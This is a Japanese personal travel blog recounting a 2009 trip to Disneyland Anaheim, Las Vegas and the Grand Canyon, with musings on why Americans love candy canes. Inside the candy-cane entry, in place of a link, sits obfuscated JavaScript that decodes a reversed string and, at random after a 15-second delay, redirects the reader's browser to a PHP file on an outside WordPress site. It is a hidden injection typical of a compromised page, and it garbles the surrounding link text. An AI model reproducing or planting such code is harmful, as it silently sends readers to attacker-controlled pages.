2009 アメリカ/キャンディケイン

【2009冬 アメリカ旅行 思い出し日記22】
12月21日 キャンディケインの謎
早朝入園したディズニーパークでみんなが並んで買っていたのは
この杖の形のキャンディ。
「キャンディケイン」
k355280302.jpg
詳しいエピソードはこちら

で、ずっと謎に思っていたので、
アメリカに住んでいる知人と合流したあと、
その話をしてみると…
「あ、その手作りのキャンディのお店、
 ニュースでやってた

とのこと。
しかも、彼女の知り合いのアメリカ人たちは
そのニュースを見て、
「このキャンディを買うためだけに
ディズニーランドに行ってもいい」

と言うらしいのです。
ますます謎です。ニュースでやるほどの大変なこと??
飴がすごいのか??飴屋がすごいのか??

で、なぜこの飴がそんなに激熱なのか聞いてみると、
ずっとアメリカにいる彼女も分からないそう。(笑)
でも、とにかくアメリカ人はこの飴が好きらしく、
クリスマスシーズンは、誰彼かまわずこの飴を配るとか。
「いい大人にもくれんのよーこんな飴を」
と知人は言っておりました。あはは。
日本で調べてみると、キリスト教の聖書から
いろんなエピソードを盛り込んだものらしいんだけど、
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andycane.htm” target=”_blank” title=”→「キャンディ・ケインとは」”>→「キャンディ・ケインとは」
それは後付けした理由と言う見方もあるみたいだし。
結局、理由はぼんやりしたまま。
まあ、あえて結論を出すなら、
アメリカ人はキャンディケインが好き

ってことで。
さて、ここからは、今年2010年の話。
昨年のこのキャンディケイン事件は、
私の中にそれなりのインパクトを植え付けたのか
今年、日本でキャンディケインを売っているのを見つけた時は
大変うれしゅうございました。
そしてこれを買い、アメリカ人気取りで
みんなに配ってやるのだ
いらぬ使命感に駆られてしまいました。
101218_1723~02
と言うわけで、着々と配って歩く毎日です。
差し出された人はもらってやってください。
自分でも食べてるけど、普通にミント味でうまいです。
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド6

【2009冬 アメリカ旅行 思い出し日記21】
12月19日 夜景スペシャル
日中は、あれやこれやで大興奮のディズニーランドですが、
夜も本当に美しいのです。
ディズニーパークの入ったところ。
DSC00258.jpg
昼間の様子と見比べてみて~
カリフォルニアパークの入り口。
DSC00349.jpg
昼間はこんな感じ。
イッツ・ア・スモール・ワールド。
DSC00358.jpg
昼間の様子はこちら。
巨大ツリー。
DSC00363.jpg
昼間は昼間でキレイだけどね。
通りからツリー方面を見ると、
ミッキーのリースとツリーが重なるポジション発見
DSC00362.jpg
お堀にキレイに映る、眠れる森の美女のお城。
DSC00264.jpg
これで、ディズニーランドともお別れ
明日は、久しぶりに知人と合流します~~
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド5

【2009冬 アメリカ旅行 思い出し日記20】
12月19日 クリスマスパレード2
クリスマスパレードは、まだまだ続きます。
ホント、長いのよ。
プリンセスゾーン、継続中。
DSC00317.jpg
キタートイストーリーゾーン
DSC00322.jpg
DSC00326.jpg
でっかいツリーも動いてきます。
DSC00327.jpg
二足歩行のトナカイも悪くない。
DSC00329.jpg
もちろん、最後はサンタさん
DSC00330.jpg
ホントに夢の世界ですね、ここは。ふう。
こんな汚れた大人でも、子どもの心に戻ったようでした。(笑)

最後は、夜景スペシャルです~~
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド4

【2009冬 アメリカ旅行 思い出し日記19】
12月19日 クリスマスパレード1
クリスマスパレードは、ホントに可愛くて大興奮。
隣のおばちゃんがグイグイカメラを前に出してきて
人のフレームに入ってくるから、
私も負けずにガシガシ撮ってやりましたふふん
もはや、言葉はいらないので、
撮りまくった写真の中から厳選した写真をどうぞー
先頭集団のテディベア。
DSC00300.jpg
DSC00304.jpg
DSC00306.jpg
ゆきだるまーかわいいー
DSC00308.jpg
ミッキーとミニーは、行ってしまうギリギリで撮ったのでイマイチ。
DSC00309.jpg
ここから、プリンセスゾーン。
DSC00316.jpg
まだまだつづきまーす
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド3

【2009冬 アメリカ旅行 思い出し日記18】
12月19日 ディズニーランド2のつづき
優先入園した人の少ないディズニーパークの中に
とあるショップに大行列がありました。
遠巻きに見てたんですが、再び通りかかると人が減ってたので
近づいてみると、そこはハンドメイドのキャンディ屋さん
店内のレジに並んでる人は、どうやら整理券を持っている模様。
さっきの行列は整理券をもらってたのかな??
それにしても、アメリカ人がそれほどまでに欲しいものってなんなのか、
興味深々でレジをじっと見ていると…彼らが買っていたのは、
良く見るステッキの形のキャンディでした。
k355280302.jpg
「えっ!?なんで????」
いくらハンドメイドだからって、並ぶほどの飴??
スーパーでも売ってるじゃん。。。
と、謎を感じたまま、去りました。
そして後日、その疑問を知り合いにぶつけてみると
面白い答えが返ってきました
謎の真相はこちら。

その後、大好きなジャック仕様になっている
「ホーンテッドマンション」へ。
DSC00279.jpg
ジャック素敵
DSC00280.jpg
そして、ホントによくキャラクターに会う
DSC00285.jpg
順番が周ってこないかもだから、とりあえず他人も撮影。
DSC00335.jpg
昨日、時間切れで逃げられたMr.インクレディブルも
一緒には撮れなかったけど、リベンジ成功
DSC00298.jpg
グーフィーは何度も会った。
でも、グーフィーと一緒にいるモヒカンは
最後まで誰なのか思いだせず。むー

DSC00297.jpg
そして、お昼ごはん
メキシカンのファストフードで、
「ハーフ」サイズのチキンをオーダーしました。
DSC00295.jpg
出てきてビックリまさか一羽分のハーフだったとは…
このあとは、大興奮のクリスマスパレード
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド2

【2009冬 アメリカ旅行 思い出し日記17】
12月19日 ディズニーランド2
さて、今日は昨日よりも早起きです。
実は昨日は、
「どうせ外国人は、開園前なんかに行って並んだりしないはず」
と、偏見に満ちた判断でゆっくり行ったら
とんでもない
開園前から並ぶのはもちろん、
パレードだってショーだって、
場所取りの激しさは日本と変わらなかったのです。
で、今日は、2dayチケットの人の、
「開園時間より1時間早く入れる特典」
を有効に使って
7時から行ってやるんですよ、ええ。(なぜか挑戦的)
並んだり待ったりすることで
日本人が外国人に負けられませんからね(え?)
そんなわけで、並んでる人々をしり目に優先入園したワタクシ、
人気のないパークをパチパチ撮りまくりました。
DSC00269.jpg
植え込みが、クリスマス仕様のミッキー。
見て、このでっかいツリー。
ちゃんと大きさが分かるように、
人込みで撮ってるところが我ながら素晴らしい
DSC00270.jpg
夜ヴァージョンもキレイなので、あとで載せますねー
お城とウォルトさんの銅像の配置は日本と同じ。
DSC00274.jpg
イッツ・ア・スモールワールド。
これも昼と夜で全然違うので、次回に夜バージョン見せます。
DSC00277.jpg
そんな一心不乱に撮影してると、なにやら人だかりが。
ふと見ると、ミッキーじゃないですかあああ
DSC00271.jpg
ホントにね、優先入園した甲斐があったというもんですよ。
この娘っ子たちもかなりキュートですが、
このあと、もちろん私も2ショットで撮ってもらいました。
レストランとかじゃなくて、パーク内でミッキーに会えるとは
本当に来てよかったわー
愛してる、アナハイム
つづく
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド1

【2009冬 アメリカ旅行 思い出し日記16】
12月18日 ディズニーランド1
さて今日から、アナハイムで2日間みっちり、
ディズニーランドリゾートを堪能します
一人で行くのはさすがにさみしいかなあ…と思ったけど、
そこはディズニーの夢の世界
いったん、入ってしまえば楽しくてしょうがない
外人さんたちも、それぞれに楽しんでて
アジア人の女一人のことなんて何とも思ってないみたいでした。(笑)
アナハイムのディズニーリゾートは、二つのパークに別れてて
一つは、「ディズニーランド・パーク」
もう一つが、「カリフォルニア・パーク」
二つの間にメイン通路があって、簡単に行き来できます。
メイン通りから見た、カリフォルニアパーク入り口。
DSC00227.jpg
ガイドマップは日本語もあって親切
チケット売り場で「初めて来たの?」と聞かれたので
「そう」と言ったら、First Visitのバッジをくれました
DSC00265.jpg
二つのパークは、合わせてもたいして広くないので
パレードやショーに合わせて行ったり来たり。
そんな広くないパーク内でのキャラクター遭遇率は高いです。
プーさんとか、1日に2回ぐらい会ったなあ。
DSC00229.jpg
基本、興味あるキャラしか積極的に撮影しない私が
一番テンションあがったのが、インクレディブルファミリーなのですが
写真撮ってもらいたい列に並んでるうち、
時間が来て帰られちゃったの~~
だから、そのあとは、自分と撮れなくても
キャラクターだけは写真に収める癖がついたのでした。
乗り物も2時間待ちとかはほとんどなく、
だいたい30分もかからず乗れました。
ファストパスもあるので、賢く周るとかなりたくさんイケます。
私は、乗りたいのは、ほぼ制覇したかな。
アラジンのショーは必見
私、2日とも見に行っちゃいました。
DSC00232.jpg
ジーニーが大好きなんだけど、舞台ではナウな話題を入れ込んだ
軽口に場内大爆笑
私の英語力でも、アメリカゴシップ好きが高じて
そこそこ内容が理解できたからすごく楽しかったー
席は早いもの順なので、早めに行って並んで
良い席を取りましょう。
私は1日目は2階席だったので、翌日は1階席をゲットして
いろんな角度から楽しめました。
夕方からは、楽しみにしてた一つ。
「ピクサーパレード」
DSC00243.jpg
DSC00252.jpg
DSC00254.jpg
DSC00255.jpg
トイストーリーは一番のお気に入り
これが楽しくないわけないでしょう
生まれて初めて、こんなに必死に写真撮りました。(笑)
そして、夜はクリスマス・イルミネーションにうっとり
DSC00260.jpg
ただのお土産屋通りなのに、なにこの美しさ。
TDRのはシンデレラ城ですが、
こちらは、「眠れる森の美女」のお城
だいぶ小ぶりですが、周囲がお堀ですごく幻想的です。
DSC00261.jpg
結局、ホテルからパークまでは、歩いて15分~20分の距離があったけど
驚くことに、“ちょっとそこでも車で移動するアメリカ人”
(と言っても、外国人観光客も多いんだろうけど)もが
みんな、歩道を歩いてホテルやモーテルまで移動してること。
ほとんどファミリーだし、夜でも安心して歩いて帰れました。
恐るべし、ディズニーパワー。
ホントにアメリカじゃないみたい~
つづく
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/アナハイム

【2009冬 アメリカ旅行 思い出し日記15】
12月17日 ラスベガス出発
午後、ラスベガスからLAに戻りました。
いつもLAXでは、知り合いにお迎えに来てもらっていたので
初めてLAXから一人で移動します。
向かうのは、アナハイム
そう、ディズニーランドに行くのです~~
え?もちろん一人ですけど??何か問題でも??
LAXからはアナハイムに行くシャトルバスがあるので、
空港の乗り場で待ってたんですけど、なかなか来なくて
どんどん夕方になるし、ちょっと心細くなったころ、
ようやく来てくれました。
待ってる人も私一人だったけど、乗客も二人だけ。
運転手のオジサンは、もう一人の男性客とずっとしゃべってました。
しかも、夕方のハイウェイは例のごとく渋滞してて
結構時間かかって、ようやくホテルに到着。
「シェラトン・パーク・ホテル」です。
DSC00225.jpg
フロントお姉さんが、一人でかわいそうだと思ったのか、
単に空いてたのか分からないけど、
花火の見える側の部屋にしてくれました
このホテル、ディズニーランドから1ブロックぐらいで、
バスの停車ポイントにもなっていたので、
移動しやすさを考えてチョイスしました。
だって、アナハイムのディズニーランドは、
なんと夜12時とかまでやってるんですよ
私は足がないし、歩いて移動できるのがベストなんで。
ところが夜、ホテル内のコンビニで調達したご飯を部屋で食べつつ、
夜の花火を見てみたら
「遠っ!!!」
いや、アメリカの1ブロックって結構あなどれないんで、
不安がよぎり、思わずグーグルマップで見ちゃいました~
もちろんその辺は、日本でも一応確認してきたんで、
予想では、多分大丈夫なんだけどなーと思いつつ。
そして、翌朝。
窓からパーク方面を見てみると・・・
やっぱりちょっと遠いかも~~~な感じ。
DSC00266.jpg
右の出っ張りが、タワー・オブ・テラーの建物。
左に観覧車とジェットコースターみたいなのが見えます。
やっぱりそれなりに遠そう…
まあ、でも歩いて行ってみるしかない・・・
つづく

2009 アメリカ/夜のラスベガス

【2009冬 アメリカ旅行 思い出し日記14】
12月16日 夜のラスベガス
さて、グランドキャニオンからラスベガスに戻ってきました。
夜はショーのチケットを取ってあるので
それまでショッピングです
近くのモールでご飯を食べつつ、お買い物。
まだ旅行は続くので、あんまり買えないな~と思うんだけど
それでも買ってしまうのが女子の性
そして、あっという間にショーの時間。
ミラージュの部屋に戻って荷物を置いてから、お隣のTIへ。
今回見るのは、シルクドソレイユの「MYSTERE」です。
実は、他に見たいショーがなかったんですよね…
と言うのも日本で、チケットを取ろうとして気づいたんですが
12月のショーの公演回数が相当少ないんですよ。
なんと、ホリディシーズンのため、
スタッフとか出演者もお休みするからってことらしくて。
正直言うと、OとかKAとか見たかったんですけど、
自分がべガスにいる日にはやってなくて、それなら
同じシルクドソレイユの一番伝統ある公演が無難かなと。
まあ、シルクドソレイユなんで普通にすごかったです。
(適当な感想やなww)
ショーが終わると、すっかり夜。
DSC00215.jpg
ネオンの街ですなあ~~
DSC00214.jpg
けっこう徒歩で移動してる人も多いので、大通りは安心。
お店も遅くまで開いてるんです。
DSC00220.jpg
べガス名物、ベラッジオホテルの噴水ショーを見に来ました
DSC00221.jpg
決まった時間に、音楽に合わせて噴水と光のショーが行われます。
15分程度ですけど、ただですからね~~ふとっぱら
こちらはミラージュのお隣のホテル、シーザース・パレス。
ローマ風の作りです。
DSC00218.jpg
シーザース・パレスに併設されているショッピングモールは
だいたいなんでも入ってるんで便利です。
DSC00213.jpg
そして、ミラージュに帰ってきました。
DSC00217.jpg
噴水ショーを待って、がっつり見てたら寒くなったので
パンダ・エクスプレスでご飯にスープもプラスしてお部屋で夕御飯。
DSC00222.jpg
サンラータンはいまいちだった・・・
サンラータンと春巻きは、アメリカでおいしいのにあったことないわ。
そうそう今回、ブログかくのに調べて初めて知ったんだけど
パンダって日本にもあるんですねー行ってみたいなあ。
日本だったら、もっと美味しそうだもん。(笑)
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/グランドキャニオン2

【2009冬 アメリカ旅行 思い出し日記13】
12月16日 グランドキャニオン2
グランドキャニオンに到着し、あとは数時間、徒歩で観光。
日本人学生の団体が一緒で、やたら騒がしいのが
ちょっと問題だったけど、わざと離れて個人行動。
意外に雪もあって、ナイアガラより全然寒い~~
そんな中、ちょっと歩いていくと、この絶景
DSC00166.jpg
言っときますけど基本、柵なんてありませんからね。
「滑落注意」の看板はありますが

実は、これってちょっと感動した一つ。
日本だったら安全第一で柵作っちゃうかもしれないけど、
この大自然に人工的なものは似合わない無粋ですよね。
もちろん、本当に危ないところは柵もありますけど
それだけで十分だと思います。
半日観光だったので、広いGキャニオン全部を周らずに
サウスリムと言う部分だけをお散歩して
いくつかのビューポイントを見て回ると
観光センターのようなところに到着。
Gキャニオンの成り立ちやら、全体模型があります。
DSC00183.jpg
真ん中下の「ヤバパイポイント」がナイスビューなんですが
学生たちが「ヤバパイポイント、マジやばい!」みたいな
べたなこと言ってはしゃいでたので脱力…
でも、学生たちが去った後に、
一人でこの大自然と向き合った時間は最高でした
DSC00199.jpg
ただ、あまりにも壮大すぎて、画枠におさまりません~
どれを撮っても、同じような写真になってしまいます。
やっぱり人間の目ってすごいなあ。これは伝わらないなーあは。
DSC00198.jpg
ちなみに、飛行機雲が多いのは、
この近くに、アメリカ空軍基地「エリア51」があるからだそう。
こんな早朝から、怪しい飛行機のテストとかしてるんだろうか
駐車場の方まで戻ってきたら、イノシシ発見
DSC00202.jpg
かわいい~~けど、突進されたら倒される大きさだな~~(笑)
けっこう、あっという間にお帰りの時間。
行くとき撮り忘れた飛行機の写真をパチリ。
DSC00205.jpg
ちなみに、これで帰ると11時くらいにはべガスに戻れます。
午後を有意義に使えますよね
あと、早朝の便の方が空気が澄んでいるので
景色もキレイに見えることが多いそうですよ~
確かにこの日も、帰りの飛行機では雲が増えてましたね。
今度は、1日かけてみっちり行きたいな~
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]